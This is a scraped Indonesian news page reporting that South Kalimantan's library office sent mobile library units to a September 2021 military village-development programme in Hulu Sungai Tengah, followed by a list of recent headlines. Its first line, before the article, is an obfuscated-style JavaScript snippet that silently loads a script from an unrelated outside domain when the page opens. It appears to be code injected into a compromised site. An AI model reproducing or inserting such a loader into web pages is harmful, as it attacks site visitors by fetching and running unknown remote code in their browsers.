(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Dispersip Kalsel

Pusling dan Trail Pustaka Turun ke Lokasi TMMD Kodim 1002/HST


KANALKALIMANTAN.COM, BARABAI – Dinas Perpustakaan dan Kearsipan (Dispersip) Kalimantan Selatan (Kalsel) semakin aktif dan inovatif meningkatkan literasi di Banua.

Kekinian, Dispersip Kalsel turunkan tim perpustakaan keliling mendukung program Tentara Manunggal Membangun Desa (TMMD) ke-112 Komando Distrik Militer (Kodim) 1002/HST tahun 2021.

Tim Palnam juga disupport istri-istri anggota TNI AD yang tergabung dalam Persit Kartika Chandra Kirana berkolaborasi di lapangan.

“Kami mengirimkan tim Pusling Palnam menindaklanjuti permintaan Korem 101 Antasari terkait TMMD di wilayah Kodim 1002 HST. Sebagai bukti kesiapsiagaan kami untuk membumikan minta baca,” kata Kepala Dispersip Kalsel Dra Hj Nurliani Dardie, Sabtu (18/9/2021).

Baca juga : Suka Traveling, Ayo Tulis Cerpen Wisata Kalsel 2021!

Selain membawa sejumlah Pusling dan unit trail, pada kegiatan aksi sosial TNI yang berlangsung dari 15 September sampai 14 Oktober ini, Dispersip Kalsel berkolaborasi dengan Eqy Morris Official untuk menghibur masyarakat di lokasi pelaksanaan TMMD ke-112.

“Sudah kita berangkatkan kemarin, dengan armada mobil perpustakaan bersama anggota, menuju Desa Rantau Keminting, Kecamatan Labuan Amas Utara, Kabupaten HST. Kita bersinergi pada bagian non fisik, untuk meramaikan kegiatan sekaligus meningkatkan minat baca di lokasi TMMD,” beber Nurliani.

Sinergi antara Dispersip, TNI dan Persit Kartika Chandara Kirana bisa membangkitkan semangat belajar masyarakat, hingga dapat meningkatkan minat baca di Kalsel. (kanalkalimantan.com/rls)

Reporter : rls
Editor : kk


Desy Arfianty

Recent Posts

Dukung Pembentukan Posbankum, Pemkab Banjar Raih Penghargaan dari Kemenkum RI

KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kabupaten Banjar menerima Piagam Penghargaan dari Kementerian Hukum (Kemenkum) RI, di… Read More

8 menit ago

Posbankum Telaga Biru Banjarmasin Ampuh Mengatasi Sengketa Kasus Warga

KANALKALIMANTAN.COM, BANJARMASIN - Pos Bantuan Hukum (Posbankum) Kelurahan Telaga Biru menjadi titik tinjauan Kementerian Hukum… Read More

2 jam ago

Perkuat Sinergi dan Konsolidasi Program, PUPR Kalsel Gelar Rakornis

KANALKALIMANTAN.COM, JAKARTA - Dalam rangka memperkuat sinergi dan konsolidasi program pembangunan infrastruktur lintas sektor dan… Read More

4 jam ago

Tingkatkan Kualitas Pelayanan, MPP Barokah Laksanakan Rakor

KANALKALIMANTAN.COM, MARTAPURA – Dinas Penanaman Modal dan Pelayanan Terpadu Satu Pintu (DPMPTSP) Kabupaten Banjar menggelar… Read More

4 jam ago

Posbankum Hadir di 52 Kelurahan se Kota Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN – Kementerian Hukum (Kemenkum) RI mengapresiasi sarana prasarana (sarpras) di Pos Bantuan Hukum… Read More

5 jam ago

Kritik Standar Etika Pejabat: Jalur Pintas hingga DPR Jadi ‘Dewan Perwakilan Partai’

KANALKALIMANTAN.COM, JAKARTA - Direktur Lingkar Madani (LIMA) Indonesia, Ray Rangkuti, melontarkan kritik pedas terhadap merosotnya… Read More

9 jam ago

This website uses cookies.